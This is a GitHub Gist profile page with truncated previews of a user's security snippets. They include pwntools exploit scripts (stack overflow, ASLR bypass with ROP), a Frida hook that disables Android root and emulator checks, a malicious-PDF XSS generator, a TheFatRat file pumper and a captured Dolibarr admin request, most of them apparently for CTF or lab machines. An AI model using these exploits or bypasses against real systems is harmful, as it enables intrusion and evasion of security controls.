Skip to content

Instantly share code, notes, and snippets.

View sharpicx's full-sized avatar

sharpicx

72 followers · 18 following
View GitHub Profile
@sharpicx
sharpicx / http.req
Created March 5, 2024 04:13
dolibarr - puffy
POST /erp/admin/security_file.php HTTP/1.1
Host: 10.1.2.120
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.1.2.120/erp/admin/security_file.php
Cookie: DOLSESSID_0720a1e225467ccab19d539968c64a66=a0jlgsjtio2d05b7ofvdcb6l73
DNT: 1
Connection: close
@sharpicx
sharpicx / exp.py
Last active March 1, 2024 07:48
ASLR leaked itself
from pwn import *
context(arch='amd64', os='linux', log_level='DEBUG')
e = ELF('./pubg')
p = e.process()
offset = 96
p.recvuntil(b"coordinate: ")
@sharpicx
sharpicx / exploit.py
Created February 27, 2024 05:35
off-by-one error | PETIR
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
e = ELF('./pwnme', checksec=True)
p = e.process()
offset = 268
p.sendline(("A" * offset) + "\xef\xbe\xad\xde")
p.interactive()
p.close()
@sharpicx
sharpicx / script.js
Last active February 26, 2024 16:29
chall v2 - my company
Java.perform(function () {
var _class = Java.use("com.xxxxxx.xxxxxxxx.MainActivity");
var _class2 = Java.use("b.b.a.a.a");
var _isEmulator = _class.isEmulator;
var _root = _class2.l;
_isEmulator.implementation = function () {
return false;
};
_root.implementation = function () {
return false;
@sharpicx
sharpicx / bad_seed.c
Last active February 13, 2024 20:12
HackMyVM - Zeug
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
int main() {
srand(1);
int var_18h = rand();
uint32_t var_14h = 0xdeadbeef;
uint32_t total = var_14h ^ var_18h;
printf("%d\n", total);
@sharpicx
sharpicx / exploit.py
Last active February 4, 2024 19:40
hackmyvm - minimal (x64 bypassing ASLR + ROP chain)
from pwn import *
context(log_level="DEBUG", os="linux", arch="amd64")
e = ELF("./shop")
p = process(e.path)
r = ROP(e)
libc = ELF("/usr/lib/libc.so.6")
offset = 120
padding = b"A" * offset
@sharpicx
sharpicx / crypto.js
Last active January 25, 2024 12:14
i got email flooding attack, so i decided to build this script.
function Si(e) {
return "0123456789abcdefghijklmnopqrstuvwxyz".charAt(e);
}
function Pi(e, t) {
return e & t;
}
function Ei(e, t) {
return e | t;
}
function Ni(e, t) {
@sharpicx
sharpicx / xss.py
Last active January 11, 2024 04:19
pdf to xss
import io
import bz2
import base64
import sys
if sys.version_info[0] < 3:
raise SystemExit("Use Python 3 (or higher) only")
def create_malpdf1(filename):
with open(filename, "w") as file:
@sharpicx
sharpicx / test.py
Created January 5, 2024 03:48
TheFatRat - FIle Pumper
import sys
#python fpump.py [file] [size] [-mb/-kb]
if len(sys.argv) < 4:
sys.exit('[-] Missing argument!\n[+] Usage: python pumper.py [file] [size] [-mb/-kb]')
fp = sys.argv[1]
size = int(sys.argv[2])
tp = sys.argv[3]
@sharpicx
sharpicx / test.js
Last active January 3, 2024 12:03
Puffy - Hacktrace
var axios = require("axios");
var readline = require("readline");
var cheerio = require("cheerio");
const rl = readline.createInterface({
input: process.stdin,
output: process.stdout
});
function hex(data) {